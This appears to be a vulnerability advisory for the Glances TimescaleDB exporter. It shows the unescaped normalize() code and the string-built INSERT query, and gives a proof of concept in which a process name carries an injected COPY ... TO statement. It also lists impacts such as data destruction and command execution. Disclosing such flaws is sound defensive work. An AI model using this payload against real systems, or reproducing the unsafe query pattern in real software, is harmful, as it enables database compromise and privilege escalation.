Summary

The TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names.

Root Cause: The normalize() function uses f"'{value}'" for string values without escaping single quotes within the value. The resulting strings are concatenated into INSERT queries via string formatting and executed directly with cur.execute() — no parameterized queries are used.

Affected Code

• File: glances/exports/glances_timescaledb/init.py, lines 79-93 (normalize function)

def normalize(self, value):
    """Normalize the value to be exportable to TimescaleDB."""
    if value is None:
        return 'NULL'
    if isinstance(value, bool):
        return str(value).upper()
    if isinstance(value, (list, tuple)):
        # Special case for list of one boolean
        if len(value) == 1 and isinstance(value[0], bool):
            return str(value[0]).upper()
        return ', '.join([f"'{v}'" for v in value])
    if isinstance(value, str):
        return f"'{value}'"  # <-- NO ESCAPING of single quotes within value

    return f"{value}"

• File: glances/exports/glances_timescaledb/init.py, lines 201-205 (query construction)

# Insert the data
insert_list = [f"({','.join(i)})" for i in values_list]
insert_query = f"INSERT INTO {plugin} VALUES {','.join(insert_list)};"
logger.debug(f"Insert data into table: {insert_query}")
try:
    cur.execute(insert_query)  # <-- Direct execution of concatenated SQL

PoC

• As a normal user, create a process with the name containing the SQL Injection payload:

exec -a "x'); COPY (SELECT version()) TO '/tmp/sqli_proof.txt' --"   python3 -c 'import time; [sum(range(500000)) or time.sleep(0.01) for _ in iter(int, 1)]'

• Start Glances with TimescaleDB export as root user:

glances --export timescaledb --export-process-filter ".*" --time 5 --stdout cpu

• Observe that sqli_proof.txt is created in /tmp directory.

Impact

• Data Destruction: DROP TABLE, DELETE, TRUNCATE operations against the TimescaleDB database.
• Data Exfiltration: Using COPY ... TO or subqueries to extract data from other tables.
• Potential RCE: Via PostgreSQL extensions like COPY ... PROGRAM which executes OS commands.
• Privilege Escalation: Any local user who can create a process with a crafted name can inject SQL into the database, potentially compromising the entire PostgreSQL instance.